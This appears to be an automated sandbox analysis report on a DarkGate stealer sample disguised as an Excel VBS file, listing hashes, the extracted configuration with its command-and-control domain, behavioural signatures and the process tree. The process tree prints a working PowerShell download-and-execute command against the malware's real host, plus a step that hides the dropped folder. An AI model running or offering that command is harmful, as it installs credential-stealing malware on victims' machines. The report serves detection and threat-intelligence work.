Analysis
-
max time kernel
134s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25-03-2024 20:54
Static task
static1
Behavioral task
behavioral1
Sample
MICROSOFT_OFFICE_EXCEL_A.vbs
Resource
win7-20240221-en
General
-
Target
MICROSOFT_OFFICE_EXCEL_A.vbs
-
Size
12KB
-
MD5
bbaded0a8091b76257dc4880c9ef59dc
-
SHA1
ecae806439418202758a1011005f726a57399032
-
SHA256
2d960acdda45cd77a0590c6f652d8496eba30e1b2b263f6a083ac5b27512d1c6
-
SHA512
4ca8b46fa3ddcf4dfd370619da65dd96a00127618828016b833d8f94f6ca5c13981160b1abf389995c14a7d700ee2d3d1a08c8199c68153265619e8684c7b41c
-
SSDEEP
192:QMg119gkCtL3IqSPN3QzGNzUoNzhLnOdEpeLSHZgNdPR/Dnm9V4nNX:Ly19gR3IquNgzG2oNdOdEpeeqlPt
Malware Config
Extracted
darkgate
admin888
goingupdate.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
BCaKNSck
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/2972-34-0x0000000003160000-0x00000000031D3000-memory.dmp family_darkgate_v6 behavioral2/memory/2972-36-0x0000000003160000-0x00000000031D3000-memory.dmp family_darkgate_v6 -
Blocklisted process makes network request 4 IoCs
flow pid Process 13 3836 powershell.exe 24 3836 powershell.exe 39 3836 powershell.exe 40 3836 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 2972 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3836 powershell.exe 3836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3836 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3788 wrote to memory of 3836 3788 WScript.exe 88 PID 3788 wrote to memory of 3836 3788 WScript.exe 88 PID 3836 wrote to memory of 2972 3836 powershell.exe 101 PID 3836 wrote to memory of 2972 3836 powershell.exe 101 PID 3836 wrote to memory of 2972 3836 powershell.exe 101 PID 3836 wrote to memory of 3592 3836 powershell.exe 102 PID 3836 wrote to memory of 3592 3836 powershell.exe 102 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3592 attrib.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MICROSOFT_OFFICE_EXCEL_A.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'goingupdate.com/ptoleqco')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\znjs\AutoHotkey.exe"C:\znjs\AutoHotkey.exe" C:/znjs/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2972
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/znjs/3⤵
- Views/modifies file attributes
PID:3592
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
53KB
MD5827895df44c913dc5a7d09b6d870515f
SHA185602bc43253a7305485915e7ccf473bb9fb80ce
SHA2564a7f3d3493544b18437d93c33bc0a58368559bf3d6a280ea37701ed26a9eca4c
SHA512754599aa4eedbd1a5fdb299921b03ad62fa7e562f4348d3ad85da00f37f7aa34a7d789fb2736f3332e1e0dea6ae95468a80ebcb95cc527a5fe3d1329314e94ff
-
Filesize
913KB
MD5b148cf7994ff0b13731d59c6dbad74d7
SHA1c80fe953e57298e7d306e224fd204237d774211a
SHA2561e179123985709f3c82c2cf0c6e8bfa857e075015254c136939862f683c5aa5f
SHA51202a752c8962014297076bc28ea658a1e317791fac302e8d8b86566b2b9fe326673b3871d97f8d89b041e9f6cbe538b7e04da61ca27b0d0536079efa566b55f51